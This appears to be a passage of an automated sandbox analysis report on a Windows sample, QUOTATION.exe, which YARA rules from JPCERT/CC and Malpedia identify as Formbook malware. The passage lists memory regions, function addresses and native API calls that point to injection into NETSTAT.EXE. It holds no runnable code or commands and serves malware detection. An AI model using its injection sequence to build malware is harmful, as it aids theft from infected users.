          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE778
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE76B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DABDC4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00362050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_00332050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041E887
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D969
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00402D90
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409E5B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409E60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041DFCE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00402FB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB090
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091002
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010AE824
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A20A8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A28EC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDF900
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2B28
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0107CB4F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100EBB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010903DA
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100ABD8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109DBD2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FA2B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A22AE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAB40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2D07
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1D55
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A25DD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE841F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109D466
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD0D20
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010ADFCE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF6E30
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1FF1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109D616
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2EF7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00522050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033003DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327ABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FFA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033122AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032699BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0331E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03301002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032720A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033120A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033128EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03311FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0331DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03266E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03240D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03311D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03302D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033125DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074E887
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00732D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00739E60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00739E5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00732FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0324B150 appears 133 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 00FDB150 appears 136 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A35B NtCreateFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A48A NtClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A10 NtQuerySection,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019560 NtWriteFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019760 NtOpenProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A770 NtOpenThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010196D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A410 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A490 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A35B NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A40A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A48A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074A53C NtAllocateVirtualMemory,
          Source: QUOTATION.exe, 00000001.00000002.297891578.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
